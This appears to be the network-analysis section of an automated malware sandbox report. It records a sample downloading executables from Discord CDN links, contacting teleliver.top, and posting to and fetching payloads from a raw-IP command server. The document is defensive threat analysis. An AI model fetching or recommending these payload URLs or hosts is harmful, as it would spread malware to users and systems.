Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
teleliver.top | 172.67.136.46 | |
cdn.discordapp.com | 162.159.130.233 |
GET
200
https://cdn.discordapp.com/attachments/896848939771367444/900335715949363280/Antesternal.exe
REQUEST
RESPONSE
BODY
GET /attachments/896848939771367444/900335715949363280/Antesternal.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:25:51 GMT
Content-Type: application/x-msdos-program
Content-Length: 4021248
Connection: keep-alive
CF-Ray: 6a91f281acb83514-ICN
Accept-Ranges: bytes
Age: 133838
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Antesternal.exe
ETag: "7c24713f4e91edad058cc94988f403e0"
Expires: Sat, 05 Nov 2022 00:25:51 GMT
Last-Modified: Wed, 20 Oct 2021 10:52:42 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1634727162233269
x-goog-hash: crc32c=UDtoxA==
x-goog-hash: md5=fCRxP06R7a0FjMlJiPQD4A==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 4021248
X-GUploader-UploadID: ADPycdv-1piyAELRinlGJoeiL3HsgAxgBKLOnkr7OCiXRF-LH_WGmuaM1N6O1Haly9NOSJjo-jpq47bMIf7uFq0J75p3S7H9LQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7XAd8%2BChR8avmYwqSZxFD6zz%2BPnp7dONZABT1%2BVHGwFvoJ42xXf3sOs3i%2FM49sGPqSlCSUOzUsg%2FbgdykWnMdwL4IfNFU6nvWNdPbXcdet5IF6ixzxuA5C%2FLcJlPVg0S9lbh2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/899705176418578565/905408828730900501/malik_2.0.exe
REQUEST
RESPONSE
BODY
GET /attachments/899705176418578565/905408828730900501/malik_2.0.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:25:52 GMT
Content-Type: application/x-msdos-program
Content-Length: 75264
Connection: keep-alive
CF-Ray: 6a91f284989c3514-ICN
Accept-Ranges: bytes
Age: 133838
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=malik_2.0.exe
ETag: "d289a9602c2d07bbf8f4edc37051af6a"
Expires: Sat, 05 Nov 2022 00:25:52 GMT
Last-Modified: Wed, 03 Nov 2021 10:51:26 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1635936686492575
x-goog-hash: crc32c=3sum6Q==
x-goog-hash: md5=0ompYCwtB7v49O3DcFGvag==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 75264
X-GUploader-UploadID: ADPycdsMQyxeoj5O0QhFPdoOHzPq59vIk1SSi4t_rW24wkqnGyNT4m_t3AiKf9JShTgfm9wAjvMfgK703gM5ojLJROCRQ7dlgw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RwU53thEen38VaaNWVNC72cGMApMqD9DBabjudcTffgpbBpfAT3WjkSSccMnOspiE%2F9xShSQc4oH30ZU3e2s1kDLqpMSlOcQsxNY%2FvkhTe2kGtLd4QaeeGvAKwgCYXYAJ7C1LA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
http://teleliver.top/mixmorty14
REQUEST
RESPONSE
BODY
GET /mixmorty14 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: teleliver.top
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:25:38 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: stel_ssid=ccc6b30590a623251f_13397277290602623098; expires=Sat, 06 Nov 2021 00:25:38 GMT; path=/; samesite=None; secure; HttpOnly
pragma: no-cache
cache-control: no-store
strict-transport-security: max-age=35768000
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jPUpAg8ppCBKmR3u2G96dLalF%2Br3NrFh0%2BvVq%2FvpUhHpfLl4hrhqBMpBHOOXs8NWLsUdA2IQ3HSFUVjeGk%2B4Igcb3OmDfRpqi6iDgnWeecxituymtSqR5DOd1%2BZQlSHC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a91f22ef9620ac2-KIX
POST
200
http://91.219.236.97/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: 91.219.236.97
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:25:39 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
GET
200
http://91.219.236.97//l/f/IKB87XwB3dP17Spzni02/3f01e0ee7d7616e1a5b10f5e09c686af287a09ab
REQUEST
RESPONSE
BODY
GET //l/f/IKB87XwB3dP17Spzni02/3f01e0ee7d7616e1a5b10f5e09c686af287a09ab HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 91.219.236.97
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:25:40 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
ETag: "612fa893-dfcff"
Accept-Ranges: bytes
GET
200
http://91.219.236.97//l/f/IKB87XwB3dP17Spzni02/70fba09628631dc7968147158bcd96dd2a63758b
REQUEST
RESPONSE
BODY
GET //l/f/IKB87XwB3dP17Spzni02/70fba09628631dc7968147158bcd96dd2a63758b HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 91.219.236.97
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:25:45 GMT
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
ETag: "612fa893-2b281b"
Accept-Ranges: bytes
POST
200
http://91.219.236.97/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
Content-Length: 878
Host: 91.219.236.97
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:25:51 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49228 162.159.129.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
Snort Alerts
No Snort Alerts